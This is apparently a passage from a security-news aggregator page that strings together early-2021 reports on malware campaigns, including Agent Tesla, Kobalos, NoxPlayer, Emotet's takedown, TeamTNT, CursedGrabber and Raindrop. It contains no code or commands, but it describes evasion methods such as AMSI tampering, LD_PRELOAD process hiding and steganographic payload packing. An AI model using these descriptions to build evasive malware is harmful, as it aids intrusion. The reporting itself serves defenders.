Agent Tesla previously targeted credentials from applications like Apple Safari, Chromium, Google Chrome, Iridium, Microsoft IE and Edge, Mozilla Firefox, Mozilla Thunderbird, OpenVPN, Opera, Opera Mail, Qualcomm Eudora, Tencent QQBrowser and Yandex. The malware also now targets FTPNavigator ( Windows-based Internet application that facilitates FTP transfer), WinVNC4 (a remote desktop control allowing users to control computers remotely), WinSCP (which provides secure file transfer between a local and a remote computer) and SmartFTP ( network file transfer program for Microsoft).
“The credential-stealing function also includes code which launches a separate thread to exfiltrate browser cookies. While this code is present in all the samples of Agent Tesla from both v2 and v3, it isn’t always used,” said researchers. “Also, this feature is not set from the configuration file—so, perhaps, it’s a premium feature attackers must buy from Agent Tesla’s developer.”
While Agent Tesla has previously communicated with the C2 server over HTTP, SMTP (simple mail transfer protocol) and FTP (file transfer protocol), the new version also uses Telegram to exfiltrate data, by sending the stolen data to a private Telegram chat room.
Agent Tesla: A Seven-Year Threat
While the Windows-targeting Agent Tesla
remote access trojan (RAT) has been active for over seven years, researchers
said that they have continued to see new variants of the malware in a growing
number of attacks over the past 10 month, compared to the infamous TrickBot or
Emotet malware, for instance.
In fact, in December 2020, Agent Tesla account for 20 percent of malware email attachments detected in researchers’ telemetry.
Moving forward, researchers said they believe Agent Tesla will continue to evolve.
“The differences between the two demonstrate how the RAT has evolved, employing multiple types of defense evasion and obfuscation to avoid detection,” they said.
Kobalos, a complex Linux malware targets high-performance computing clusters
3.2.2021
Virus
Securityaffairs
ESET experts uncovered a previously undocumented piece of malware that had been
observed targeting high-performance computing clusters (HPC).
ESET analyzed a
new piece of malware, dubbed Kobalos, that was employed in attacks against
high-performance computing clusters (HPC).
The name Kobalos comes from a small sprite from Greek mythology, a mischievous creature fond of tricking and frightening mortals.
Kobalos is a small Linux malware, only 25 Kb for x86-64 samples, that also works on FreeBSD and Solaris, and possibly on Windows and AIX systems as well.
Evidence of the malware activity was first spotted in late 2019, but the threat actors behind the malware remained active throughout 2020.
“Kobalos is a generic backdoor in the sense that it contains broad commands that don’t reveal the intent of the attackers.” reads the analysis published by ESET. “In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers.”
The researchers were not able to reveal the intent of the attackers behind the malware either to link the threat to previously reported infections.
The experts pointed out that Kobalos has not been used to abuse infected
supercomputers for cryptocurrency mining.
Experts noticed that it is possible
to determine a Kobalos infection by connecting to the SSH server using a
specific TCP source port, using that knowledge they were able to scan the
internet to find potential victims.
The list of systems targeted by Kobalos included high-performance computing clusters (HPC), an endpoint security solutions provider, government agencies, and personal servers in North America, universities, hosting firms in Europe, and a major ISP in Asia.
Kobalos stands out for including the C&C code within itself, a design choice
that allows operators to turn any compromised server into a C&C.
ESET
researchers also noticed that attackers deployed on the infected systems a tool
designed to steal credentials from SSH clients. The tool is a tainted OpenSSH
client, attackers likely used it to steal SSH credentials and use them to spread
to other servers within the target organization.
The level of sophistication for the Kobalos malware is rarely seen in Linux
malware, for this reason, experts believe it may be running around for a little
while and it will be continuously improved.
“The numerous well-implemented
features and the network evasion techniques show the attackers behind Kobalos
are much more knowledgeable than the typical malware author targeting Linux and
other non-Windows systems,” concludes ESET. “Their targets, being quite high
profile, also show that the objective of the Kobalos operators isn’t to
compromise as many systems as possible. Its small footprint and network evasion
techniques may explain why it went undetected until we approached victims with
the results of our internet-wide scan.”
Sophisticated Multiplatform Malware 'Kobalos' Targets Supercomputers
3.2.2021
Virus
Securityweek
Cybersecurity firm ESET on Tuesday published a report detailing what it described as a previously undocumented piece of malware that had been observed targeting high-performance computing (HPC) clusters.
ESET has named this piece of malware Kobalos due to its small size (x86-64 samples are only 25 Kb) and its many tricks — Kobalos is a mischievous creature from Greek mythology. While the company’s analysis focuses on the Linux version of the malware, researchers say Kobalos also works on FreeBSD and Solaris, and possibly on Windows and AIX systems as well.
ESET says it hasn’t been able to determine the goals of the Kobalos operators, particularly since it could only obtain the malware itself and not any network traffic generated by an attack. However, the company hopes that its report could help others further analyze the threat.
The first known victim of Kobalos was spotted in late 2019 and ESET said the group operating the malware had remained active throughout 2020. However, the analyzed code also contained strings related to very old Microsoft operating systems, specifically Windows 3.11 and Windows 95.
Threat actors targeting supercomputers — often for cryptocurrency mining — is not unheard of, but the cybersecurity company’s researchers have not found any links between Kobalos and previously reported incidents. Kobalos has not been seen attempting to abuse compromised supercomputers for cryptocurrency mining.
Moreover, Kobalos has been observed targeting other types of entities as well. ESET says victims include an endpoint security solutions provider, government agencies, and personal servers in North America; universities, HPC infrastructure, a marketing agency, and hosting firms in Europe; and a major ISP in Asia.
Researchers have described Kobalos as a “generic backdoor” that can allow its operators to perform a wide range of tasks, including gain remote access to the compromised device’s file system, spawn a shell and execute arbitrary commands, and use the infected device as a proxy. Kobalos stands out for having the C&C code within itself, which allows its operators to turn any compromised server into a C&C.
According to ESET, the attackers have also delivered a tool designed to steal credentials from SSH clients on devices infected with Kobalos — this stealer is actually a trojanized OpenSSH client. Researchers believe the threat actors may be using the stolen SSH credentials to help Kobalos spread to other servers.
“The numerous well-implemented features and the network evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems,” ESET said in its report. “Their targets, being quite high profile, also show that the objective of the Kobalos operators isn’t to compromise as many systems as possible. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our internet-wide scan.”
Agent Tesla Malware Spotted Using New Delivery & Evasion Techniques
3.2.2021
Virus
Thehackernews
Security researchers on Tuesday uncovered new delivery and evasion techniques adopted by Agent Tesla remote access trojan (RAT) to get around defense barriers and monitor its victims.
Typically spread through social engineering lures, the Windows spyware not only now targets Microsoft's Antimalware Scan Interface (AMSI) in an attempt to defeat endpoint protection software, it also employs a multi-stage installation process and makes use of Tor and Telegram messaging API to communicate with a command-and-control (C2) server.
Cybersecurity firm Sophos, which observed two versions of Agent Tesla — version 2 and version 3 — currently in the wild, said the changes are yet another sign of Agent Tesla's constant evolution designed to make a sandbox and static analysis more difficult.
password auditor
"The differences we see between v2 and v3 of Agent Tesla
appear to be focused on improving the success rate of the malware against
sandbox defenses and malware scanners, and on providing more C2 options to their
attacker customers," Sophos researchers noted.
A .NET based keylogger and information stealer, Agent Tesla has been deployed in
a number of attacks since late 2014, with additional features incorporated over
time that allows it to monitor and collect the victim's keyboard input, take
screenshots, and exfiltrate credentials belonging to a variety of software such
as VPN clients, FTP and email clients, and web browsers.
Last May, during the height of the pandemic, a variant of the malware was found to spread via COVID-themed spam campaigns to steal Wi-Fi passwords alongside other information – such as Outlook email credentials – from target systems.
Then in August 2020, the second version of Agent Malware increased the number of applications targeted for credential theft to 55, the results of which were then transmitted to an attacker-controlled server via SMTP or FTP.
While the use of SMTP to send information to a mail server controlled by the attacker was spotted way back in 2018, one of the new versions identified by Sophos was also found to leverage Tor proxy for HTTP communications and messaging app Telegram's API to relay the information to a private chat room.
Besides this, Agent Tesla now attempts to modify code in AMSI in a bid to skip scans of malicious payloads fetched by the first-stage downloader, which then grabs obfuscated base64-encoded code from Pastebin (or Hastebin) that acts as the loader for the Agent Tesla malware.
AMSI is an interface standard that allows applications and services to be integrated with any existing antimalware product that's present on a Windows machine.
Furthermore, to achieve persistence, the malware copies itself to a folder and sets that folder's attributes to "Hidden" and "System" in order to conceal it from view in Windows Explorer, the researchers explained.
"The most widespread delivery method for Agent Tesla is malicious spam," Sophos threat researchers Sean Gallagher and Markel Picado said.
"The email accounts used to spread Agent Tesla are often legitimate accounts that have been compromised. Organizations and individuals should, as always, treat email attachments from unknown senders with caution, and verify attachments before opening them."
Alleged Gaming Software Supply-Chain Attack Installs Spyware
2.2.2021
Virus
Threatpost
Researchers allege that software used for downloading Android apps onto PCs and Macs has been compromised to install malware onto victim devices.
Researchers allege, attackers have compromised the update mechanism of NoxPlayer, which is software that allows gamers to run Android apps on their PCs or Macs. They then installed malware onto victims’ devices with surveillance-related capabilities.
NoxPlayer is developed by BigNox, which is a China-based company that claims that it has over 150 million users worldwide (notably, however, BigNox users are predominantly in Asian countries). When contacted by researchers, BigNox denied being affected by the attack. Threatpost has reached out to BigNox for further comment.
“We have contacted BigNox about the intrusion, and they denied being affected,” said Ignacio Sanmillan, malware researcher with ESET, on Monday. “We have also offered our support to help them past the disclosure in case they decide to conduct an internal investigation.”
On the heels of the alleged attack, which occurred January 2021, three different malware families have been deployed – reportedly from tailored, malicious updates – to a very select set of victims. Researchers said, out of more than the 100,000 users in their telemetry that have Noxplayer installed on their machines, only five users received a malicious update, showing the attack is a “highly targeted operation.” These victims are based in Taiwan, Hong Kong and Sri Lanka.
“We were unsuccessful finding correlations that would suggest any relationships among victims,” said Sanmillan. “However, based on the compromised software in question and the delivered malware exhibiting surveillance capabilities, we believe this may indicate the intent of collecting intelligence on targets somehow involved in the gaming community.”
Researchers claim that the attack vector stems from NoxPlayer’s update mechanism. They said they have “sufficient evidence” to show that the BigNox infrastructure (res06.bignox.com) was compromised to host malware. They also assert that BigNox’s HTTP API infrastructure (api.bignox.com), used for requests and responses between the clients and BigNox servers, may have been compromised as well.
The location of victims. Credit: ESET
A normal NoxPlayer update process works as follows: Upon launch NoxPlayer queries the update server via the BigNox HTTP API (api.bignox.com) in order to retrieve specific update information. If NoxPlayer detects a newer version of the software, it prompts the user with an option to install it. If the user chooses to update, the main NoxPlayer binary application (Nox.exe) supplies update parameters received to another binary in its toolbox (NoxPack.exe), which is in charge of downloading the update.
For victims, the attack occurs when the BigNox API server responds to the client request with specific update information, including the URL to download the update from BigNox legitimate infrastructure. Here, researchers believe that either the legitimate update stored in BigNox infrastructure may have been replaced with malware, or that the URL given by the BigNox API server is not used for legitimate updates. Either way, malicious files are then deployed via the update mechanism, and malware is then installed on the victim’s machine.
Unlike legitimate BigNox updates, these malicious files are not digitally signed, strongly suggesting that the BigNox build system was not compromised, but just its systems that distribute updates, said researchers.
Also, “we are highly confident that these additional updates were performed by Nox.exe supplying specific parameters to NoxPack.exe, suggesting that the BigNox API mechanism may have also been compromised to deliver tailored malicious updates,” said Sanmillan.
While it could be argued that the attack is a man-in-the-middle (MiTM) attack rather than a full-on compromise, researchers said they believe this is “unlikely.” MiTM attacks occur when an attacker intercepts communications between two parties in order to modify traffic traveling between the two. However, researchers said the attacker already had a foothold on the BigNox infrastructure. Also, they said they were unable to reproduce the download of the malware samples while using the HTTPS protocol (hosted on res06.bignox.com) from a test machine.
Researchers observed three different malware variants utilized in the attacks. While the first malware variant had not been previously detected, the second variants deployed a final payload consisting of a variant of the known Gh0st malware, a remote access trojan (RAT) that has keylogger capabilities. The third variant meanwhile deployed the known PoisonIvy RAT, which has spying capabilities, as its final payload.
While all three malware samples had slight variations in how they were deployed and their bundled components, all had basic monitoring capabilities. For instance, all malware variants were able to download specific files and directories from the victims, delete specified files from the disk, and upload files.
The targeted gaming victimology makes this campaign stand out, said researchers, as cyberespionage attacks are typically instead targeted at governments or human-rights activists.
“We have detected various supply-chain attacks in the last year, such as Operation SignSight or the compromise of Able Desktop among others,” said Sanmillan. “However, the supply-chain compromise involved in Operation NightScout is particularly interesting due to the targeted vertical, as we rarely encounter many cyberespionage operations targeting online gamers.”
Hijacked Perl.com Domain Hosted on IP Address Linked to Malicious Activity
2.2.2021
Virus
Securityweek
The Perl.com domain, which since 1997 had been serving articles about Perl programming, was hijacked last week.
Managed by The Perl Foundation, the site had David Farrell as editor, but received contributions for numerous Perl programming language enthusiasts, including Brian Foy, who also authored several books on Perl.
The Perl Foundation announced last week that the domain was hijacked, warning users to steer clear of Perl.com, due to possible connections to sites associated with malware distribution.
“The perl.com domain was hijacked this morning, and is currently pointing to a parking site. […] We encourage you NOT to visit the domain, as there are some signals that it may be related to sites that have distributed malware in the past,” the announcement reads.
Users who might have selected Perl.com as their CPAN mirror are advised to update their mirror in CPAN.pm.
While work is being done to recover the domain, Perl enthusiasts looking for articles on the programming language have been redirected to perldotcom.perl.org, which hosts the content previously present on the hijacked website.
The issue that led to the hijack, Foy explains, was “some snafu with the perl.com domain registration.” Because of that, an unknown party was able to register the domain for the next ten years.
Foy later said the incident apparently involved an "account hack" and it was not an isolated incident, with many other domains impacted.
Shortly after the Perl.com domain was hijacked, The Register found it up for sale on afternic.com (part of GoDaddy) for $190,000. The listing was pulled shortly after.
While Perl.com can no longer be accessed over HTTPS, attempting to visit the HTTP version “sets a few tracking cookies, fetches some JavaScript, and renders as a blank page,” Sophos reveals.
The Google Cloud IP address that Perl.com is now hosted at, namely 35.186.238[.]101, is known to have been used for malware distribution in the past, including for the Locky ransomware, but also as a command and control (C&C) server, BleepingComputer notes.
Although the domain doesn’t appear malicious for the time being, users should refrain from accessing Perl.com until the original registrants are able to regain control of it.
Rocke Group’s Malware Now Has Worm Capabilities
29.1.2021 Virus Threatpost
The Pro-Ocean cryptojacking malware now comes with the ability to spread like a worm, as well as harboring new detection-evasion tactics.
Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.
The malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with “worm” capabilities and rootkit detection-evasion features.
“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,” said Aviv Sasson with Palo Alto Networks on Thursday. “As we saw, this sample has the capability to delete some cloud providers’ agents and evade their detection.”
Since its discovery in 2018, the Rocke Group has widened its targeting of cloud applications – including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis – for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group’s latest update aims to sidestep these detection and mitigation efforts.
Pro-Ocean Malware
Pro-Ocean uses a variety of known vulnerabilities to target
cloud applications. These include a critical flaw in Apache ActiveMQ
(CVE-2016-3088) and a high-severity vulnerability in Oracle WebLogic
(CVE-2017-10271). The malware has also been spotted targeting unsecure instances
of Redis.
Once downloaded, the malware attempts to remove other malware and cryptominers, including Luoxk, BillGates, XMRig and Hashfish. It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.
The malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains “worm” capabilities.
New Features
The latter “worm” feature is a new add for Pro-Ocean, which
previously only infected victims manually. The malware now uses a Python
infection script to retrieve the public IP address of the victim’s machine. It
does so by accessing an online service with the address “ident.me,” which scopes
out IP addresses for various web servers. Then, the script tries to infect all
the machines in the same 16-bit subnet (e.g. 10.0.X.X).
“It does this by blindly executing public exploits one after the other in the
hope of finding unpatched software it can exploit,” said Sasson.
Pro-Ocean’s modular structure. Credit: Palo Alto Networks
Other threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT’s cryptomining worm, for instance, was found spreading through the Amazon Web Services (AWS) cloud and collecting credentials in August.
The Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.
These updated features exist in Libprocesshider, a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean – however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.
For example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.
“If it determines that the file needs to be hidden, the malicious function will return a ‘No such file or directory’ error, as if the file in question does not exist,” said Sasson.
Researchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the cloud grows as a lucrative target for attackers.
“Cryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.”
European Authorities Disrupt Emotet — World's Most Dangerous Malware
29.1.2021
Virus
Thehackernews
Law enforcement
agencies from as many as eight countries dismantled the infrastructure of
Emotet, a notorious email-based Windows malware behind several botnet-driven
spam campaigns and ransomware attacks over the past decade.
The coordinated takedown of the botnet on Tuesday — dubbed "Operation Ladybird" — is the result of a joint effort between authorities in the Netherlands, Germany, the U.S., the U.K., France, Lithuania, Canada, and Ukraine to take control of servers used to run and maintain the malware network.
"The Emotet infrastructure essentially acted as a primary door opener for computer systems on a global scale," Europol said. "What made Emotet so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomware, onto a victim's computer."
More Than a Malware
Since its first identification in 2014, Emotet has
evolved from its initial roots as a credential stealer and banking Trojan to a
powerful "Swiss Army knife" that can serve as a downloader, information stealer,
and spambot depending on how it's deployed.
Known for being constantly under development, cybercrime service updates itself regularly to improve stealthiness, persistence, and add new spying capabilities through a wide range of modules, including a Wi-Fi spreader to identify and compromise fresh victims connected to nearby Wi-Fi networks.
Last year, the malware was linked to several botnet-driven spam campaigns and
even capable of delivering more dangerous payloads such as TrickBot and Ryuk
ransomware by renting its botnet of compromised machines to other malware
groups.
"The Emotet group managed to take e-mail as an attack vector to a next level," Europol said.
700 Emotet Servers Seized
The U.K.'s National Crime Agency (NCA) said the
operation took nearly two years to map the infrastructure of Emotet, with
multiple properties in the Ukrainian city of Kharkiv raided to confiscate
computer equipment used by the hackers.
The Ukrainian Cyberpolice Department also arrested two individuals allegedly involved in the botnet's infrastructure maintenance, both of whom are facing 12 years in prison if found guilty.
"Analysis of accounts used by the group behind Emotet showed $10.5 million being moved over a two-year period on just one Virtual Currency platform," the NCA said, adding "almost $500,000 had been spent by the group over the same period to maintain its criminal infrastructure."
Globally, Emotet-linked damages are said to have cost about $2.5 billion, Ukrainian authorities said.
With at least 700 servers operated by Emotet across the world now having been
taken down from the inside, machines infected by the malware are set to be
directed to this law enforcement-infrastructure, thus preventing further
exploitation.
In addition, the Dutch National Police has released a tool to check for potential compromise, based on a dataset containing 600,000 e-mail addresses, usernames, and passwords that were identified during the operation.
Emotet to Be Wiped En Masse on April 25, 2021
The Dutch police, which seized
two central servers located in the country, said it has deployed a software
update to neutralize the threat posed by Emotet effectively.
"All infected computer systems will automatically retrieve the update there, after which the Emotet infection will be quarantined," the agency said. According to a tweet from a security researcher who goes by the Twitter handle milkream, Emotet is expected to be wiped on April 25, 2021, at 12:00 local time from all compromised machines.
Given the nature of the takedown operation, it remains to be seen if Emotet can stage a comeback. If it does, it wouldn't be the first time a botnet survived major disruption efforts.
As of writing, Abuse.ch's Feodo Tracker shows at least 20 Emotet servers are still online.
"A combination of both updated cybersecurity tools (antivirus and operating systems) and cybersecurity awareness is essential to avoid falling victim to sophisticated botnets like Emotet," Europol cautioned.
"Users should carefully check their e-mail and avoid opening messages and especially attachments from unknown senders. If a message seems too good to be true, it likely is and e-mails that implore a sense of urgency should be avoided at all costs."
TeamTNT Cloaks Malware With Open-Source Tool
28.1.2021 Virus Threatpost
The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.
The TeamTNT threat group has added a new detection-evasion tool to its arsenal, helping its cryptomining malware skirt by defense teams.
The TeamTNT cybercrime group is known for cloud-based attacks, including targeting Amazon Web Services (AWS) credentials in order to break into the cloud and use it to mine for the Monero cryptocurrency. It has also previously targeted Docker and Kubernetes cloud instances.
The new detection-evasion tool, libprocesshider, is copied from open-source repositories. The open-source tool, from 2014 has been located on Github, and is described as having capabilities to “hide a process under Linux using the ld preloader.”
“While the new functionality of libprocesshider is to evade detection and other basic functions, it acts as an indicator to consider when hunting for malicious activity on the host level,” said researchers with AT&T’s Alien Labs, on Wednesday.
The new tool is delivered within a base64-encoded script, hidden in the TeamTNT cryptominer binary, or via its Internet Relay Chat (IRC) bot, called TNTbotinger, which is capable of distributed denial of service (DDoS) attacks.
In the attack chain, after the base64-encoded script is downloaded, it runs through multiple tasks. These include modifying the network DNS configuration, setting persistence (through systemd), downloading the latest IRC bot configuration, clearing evidence of activities – and dropping and activating libprocesshider. The tool is dropped as a hidden Tape Archive file (also known as the Tar format, which is used for open-source software distribution) on the disk and then decompressed by the script and written to ‘/usr/local/lib/systemhealt.so’.
libprocesshider then aims to hides the malicious process from process information programs such as `ps’ and `lsof.’
These are both process-viewer tools, which use the file ‘/usr/bin/sbin. The ‘ps’ program (short for “process status”) displays currently running processes in many Unix-like operating systems; meanwhile, ‘lsof’ is a command (short for “list open files”), also utilized in Unix-like operating systems to, as the name suggests, report a list of all open files and the processes that opened them. Hiding the process from these two process-viewer tools would allow the attacker to cloak its malicious activity.
libprocesshider uses a process called preloading in order to hide its activity from ‘ps’ and ‘lsof.’ This process allows the system to load a custom shared library before other system libraries are loaded.
“If the custom shared library exports a function with the same signature of one located in the system libraries, the custom version will override it,” said researchers.
The uploaded custom shared library then allows the tool to implement the function readdir(). This function is utilized by processes like `ps’ to read the /proc directory to find running processes. It uses this function to modify the return value, in case ‘ps’ find the malicious process, in order to hide it.
TeamTNT Continues to Add New Features
From time to time, TeamTNT has been
seen deploying various updates to its cryptomining malware, including a new
memory loader uncovered just a few weeks ago, which was based on Ezuri and
written in GOlang.
In August, TeamTNT’s cryptomining worm was discovered spreading through the AWS cloud and collecting credentials. Then, after a hiatus, the TeamTNT group returned in September to attack Docker and Kubernetes cloud instances by abusing a legitimate cloud-monitoring tool called Weave Scope.
Discord-Stealing Malware Invades npm Packages
23.1.2021
Virus
Threatpost
The CursedGrabber malware has infiltrated the open-source software code repository.
Three malicious software packages have been published to npm, a code repository for JavaScript developers to share and reuse code blocks. The packages represent a supply-chain threat given that they may be used as building blocks in various web applications; any applications corrupted by the code can steal tokens and other information from Discord users, researchers said.
Discord is designed for creating communities on the web, called “servers,” either as standalone forums or as part of another website. Users communicate with voice calls, video calls, text messaging, media and files. Discord “bots” are central to its function; these are AIs that can be programmed to moderate discussion forums, welcome and guide new members, police rule-breakers and perform community outreach. They’re also used to add features to the server, such as music, games, polls, prizes and more.
Discord tokens are used inside bot code to send commands back and forth to the Discord API, which in turn controls bot actions. If a Discord token is stolen, it would allow an attacker to hack the server.
As of Friday, the packages (named an0n-chat-lib, discord-fix and sonatype, all published by “scp173-deleted”) were still available for download. They make use of brandjacking and typosquatting to lure developers into thinking they’re legitimate. There is also “clear evidence that the malware campaign was using a Discord bot to generate fake download counts for the packages to make them appear more popular to potential users,” according to researchers at Sonatype.
The authors are the same operators behind the CursedGrabber Discord malware, the researchers said, and the packages share DNA with that threat.
The CursedGrabber Discord malware family, discovered in November, targets Windows hosts. It contains two .exe files which are invoked and executed via ‘postinstall’ scripts from the manifest file, ‘package.json’. One of the .exe files scans user profiles from multiple web browsers along with Discord leveldb files, steals Discord tokens, steals credit-card information, and sends user data via a webhook to the attacker. The second unpacks additional code with multiple capabilities, including privilege escalation, keylogging, taking screenshots, planting backdoors, accessing webcams and so on.
In the case of the three npm packages, these “contain variations of Discord token-stealing code from the Discord malware discovered by Sonatype on numerous occasions,” said Sonatype security researcher Ax Sharma, in a Friday blog posting.
Open-Source Software Repository Malware
Uploading malicious packages to code
repositories is an increasingly common tactic used by malware operators. In
December for instance, RubyGems, an open-source package repository and manager
for the Ruby web programming language, had to take two of its software packages
offline after they were found to be laced with malware.
The gems contained malware that ran itself persistently on infected Windows machines and replaced any Bitcoin or cryptocurrency wallet address it found on the user’s clipboard with the attacker’s. So, if a user of a corrupted web app built using the gems were to copy-paste a Bitcoin recipient wallet address somewhere on their system, the address would be replaced with that of the attacker.
“We have repeatedly seen…open-source malware striking GitHub, npm and RubyGems, attackers can exploit trust within the open-source community to deliver pretty much anything malicious, from sophisticated spying trojans like njRAT, to…CursedGrabber,” Sharma told Threatpost.
The latest findings reiterate that software supply-chain attacks will only become more common and underscore how crucial it is for organizations that protect against such attacks and continuously improve their strategies against them, according to Sonatype.
New 'FreakOut' Malware Ensnares Linux Devices Into Botnet
21.1.2021
BotNet Virus
Securityweek
A recently identified piece of malware is targeting Linux devices to ensnare them into a botnet capable of malicious activities such as distributed denial of service (DDoS) and crypto-mining attacks.
Dubbed FreakOut, the malware is infecting devices that haven’t yet received patches for three relatively new vulnerabilities, including one that was made public earlier this month.
FreakOut, according to cybersecurity firm Check Point, can scan ports, harvest information, create and send data packets, perform network sniffing, and can also launch DDoS and network flooding attacks.
One of the vulnerabilities targeted by the botnet is CVE-2020-28188, an unauthenticated, remote command execution in TerraMaster TOS (TerraMaster Operating System) up to version 4.2.06. TerraMaster is a vendor of network- and direct-attached storage solutions.
The second one is CVE-2021-3007, a deserialization bug in Zend Framework that could lead to remote code execution. The popular collection of libraries for web application development is no longer supported by its maintainer.
FreakOut also targets CVE-2020-7961, a deserialization in Liferay Portal prior to 7.2.1 CE GA2, which could lead to the remote execution of arbitrary code via JSON web services (JSONWS). Liferay Portal is a free, open-source enterprise portal designed for building web portals and sites.
“Patches are available for all products impacted in these CVEs, and users of these products are advised to urgently check any of these devices they are using and to update and patch them to close off these vulnerabilities,” Check Point notes.
Once infected, the devices targeted by FreakOut are abused by the threat actors behind the attack to target more devices and expand the botnet, and further malicious activity, including lateral movement, crypto-mining, and DDoS attacks.
“Our research found evidence from the attack campaign’s main C&C server that around 185 devices had been hacked,” Check Point says.
Over the course of several days in January 2021, Check Point observed more than 380 attack attempts, with North America and Western Europe targeted the most. Finance (26.47%), government (23.53%), and healthcare (19.33%) were the industries affected the most.
SolarWinds Malware Arsenal Widens with Raindrop
20.1.2021
Virus
Threatpost
The post-compromise backdoor installs Cobalt Strike to help attackers more laterally through victim networks.
An additional piece of malware, dubbed Raindrop, has been unmasked in the sprawling SolarWinds supply-chain attacks. It was used in targeted attacks after the effort’s initial mass Sunburst compromise, researchers said.
The SolarWinds espionage attack, which has affected several U.S. government agencies, tech companies like Microsoft and FireEye, and many others, began with a poisoned software update that delivered the Sunburst backdoor to around 18,000 organizations last spring. After that broad-brush attack, the threat actors (believed to have links to Russia) selected specific targets to further infiltrate, which they did over the course of several months. The compromises were discovered in December.
Researchers have identified Raindrop as one of the tools used for those follow-on attacks. It’s a backdoor loader that drops Cobalt Strike in order to perform lateral movement across victims’ networks, according to Symantec analysts.
Cobalt Strike is a penetration-testing tool, which is commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it simulates an attack. Threat actors have since figured out how to turn it against networks to spread through an environment, exfiltrate data, deliver malware and more.
Three Raindrop Victims
Symantec observed the malware being used on three
different victim computers. The first was a high-value target, with a computer
access-and-management software installed. That management software could be used
to access any of the other computers in the compromised organization.
In addition to installing Cobalt Strike, Symantec researchers also observed a legitimate version of 7-Zip being used to install Directory Services Internals (DSInternals) on the computer. 7-Zip is a free and open-source file archiver, while DSInternals is a legitimate tool which can be used for querying Active Directory servers and retrieving data, typically passwords, keys or password hashes.
In the second victim, Raindrop installed Cobalt Strike and then executed PowerShell commands that were bent on installing further instances of Raindrop on additional computers in the organization.
And in a third victim, Raindrop installed Cobalt Strike without a HTTP-based command-and-control server.
“It…was rather configured to use a network pipe over SMB,” according to Symantec’s analysis, released Monday. “It’s possible that in this instance, the victim computer did not have direct access to the internet, and so command-and-control was routed through another computer on the local network.”
Raindrop joins other custom malware that has been documented as being used in the attacks, including the Teardrop tool, which researchers said was delivered by the initial Sunburst backdoor.
Both Raindrop and Teardrop act as loaders for Cobalt Strike; and, Raindrop samples using HTTPS C2 communication follow very similar configuration patterns to Teardrop, researchers said. However, Raindrop uses a different custom packer from Teardrop; and, Raindrop isn’t fetched by Sunburst directly, researchers said.
Raindrop Malware Hides in 7-Zip
Symantec has uncovered that Raindrop is
compiled as a DLL, which is built from a modified version of 7-Zip. The malware
authors have in this case embedded an encoded payload within the 7-Zip code.
“The 7-Zip code is not utilized and is designed to hide malicious functionality added by the attackers,” the researchers explained. “Whenever the DLL is loaded, it starts a new thread from the DllMain subroutine that executes the malicious code.”
The malicious thread first delays execution in an effort to evade detection. Then, to find and extract the payload, the packer uses steganography, scanning the bytes starting from the beginning of the subroutine until it finds a code that signals the start of the payload code.
According to Symantec, extracting the code “involves simply copying data from pre-determined locations that happen to correspond to immediate values of the relevant machine instructions.”
Then it decrypts and decompresses the extracted payload using with AES and LZMA algorithms, respectively, then executes the decrypted payload as shellcode.
“The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers,” according to the Symantec analysis. “While Teardrop was used on computers that had been infected by the original Sunburst Trojan, Raindrop appeared elsewhere on the network, being used by the attackers to move laterally and deploy payloads on other computers.”
Linux Devices Under Attack by New FreakOut Malware
20.1.2021 Virus Threatpost
The FreakOut malware is adding infected Linux devices to a botnet, in order to launch DDoS and cryptomining attacks.
Researchers are warning a novel malware variant is targeting Linux devices, in order to add endpoints to a botnet to then be utilized in distributed-denial-of-service (DDoS) attacks and cryptomining.
The malware variant, called FreakOut, has a variety of capabilities. Those include port scanning, information gathering and data packet and network sniffing. It is actively adding infected Linux devices to a botnet, and has the ability to launch DDoS and network flooding attacks, as well as cryptomining activity.
“If successfully exploited, each device infected by the FreakOut malware can be used as a remote-controlled attack platform by the threat actors behind the attack, enabling them to target other vulnerable devices to expand their network of infected machines,” said researchers with Check Point Research in a Tuesday analysis.
FreakOut first targets Linux devices with specific products that have not been
patched against various flaws.
These include a critical remote command execution flaw (CVE-2020-28188) in TerraMaster TOS (TerraMaster Operating System), a popular data storage device vendor. Versions prior to 4.2.06 are affected, while a patch will become available in 4.2.07.
Also targeted is a critical deserialization glitch (CVE-2021-3007) in Zend Framework, a popular collection of library packages that’s used for building web applications. This flaw exists in versions higher than Zend Framework 3.0.0.
“The maintainer no longer supports the Zend framework, and the lamins-http vendor released a relevant patch for this vulnerability should use 2.14.x bugfix release (patch),” researchers said.
